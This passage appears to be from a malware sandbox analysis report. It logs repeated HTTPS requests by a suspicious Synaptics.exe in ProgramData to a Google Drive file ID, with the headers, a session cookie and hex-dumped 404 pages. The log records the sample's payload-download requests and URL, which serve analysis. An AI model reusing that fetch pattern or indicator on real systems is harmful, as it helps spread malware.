                                                                                                                    2024-12-30 10:25:49 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6b 63 31 79 50 32 70 52 5f 7a 7a 77 4b 30 69 37 77 57 58 70 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="kc1yP2pR_zzwK0i7wWXpYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:49 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    77192.168.2.949842142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:48 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:49 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7kasKj1-HIRSNKNTgYCaGRvgq23ksbRw6db3M04rBbzf2GJrm3tDctiSsuxruGToDMJkc1RLk
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:49 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hRjFIFkDEutSfuuEQOcuiQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:49 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:49 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 33 6c 6e 50 6f 57 36 52 43 67 53 2d 6f 48 65 30 49 64 78 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="l3lnPoW6RCgS-oHe0IdxrQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:49 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    78192.168.2.949847142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:50 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:50 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6akkKnpOigftMaCiywablOKUnwStRRSmcJV54lSz-aMG-1atZn4ObKnWZSSE0nG18mSAf3afE
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EdYe7V9LT1smBrek8aYxNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:50 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:50 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 50 4a 79 38 48 4d 57 53 65 4e 5a 54 57 67 5f 5f 73 41 30 52 77 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="PJy8HMWSeNZTWg__sA0Rwg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:50 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    79192.168.2.949848142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:50 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-GtsgUC6KtsASNkvgAQhIyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    80192.168.2.949849142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:50 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:50 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:50 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-JzfjBNuRZTVqKVy-H4TM4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    81192.168.2.949850142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:51 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:51 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0r_imhGte1s0cmpIyNDYZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    82192.168.2.949851142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:51 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4Pd2JZdLN5rxP2YRFlt1z5ZK45_21DhlLbN3VLWNBC2cOchmIhdJFXN24QPs4xBe4RYqqdU_c
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-oS-mmyYWXisnZt2GA575MA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:51 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:51 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 58 39 4a 5a 6d 65 78 6f 39 4c 35 32 34 73 32 4b 66 74 58 54 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="IX9JZmexo9L524s2KftXTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:51 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    83192.168.2.949852142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:51 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC6gTZ1GLjWAi_LNWUp6_920NWYSkqnv_mj1ErfNpW1wyRK9rieehWMOFkUkWHN7aCGz
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:51 GMT
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
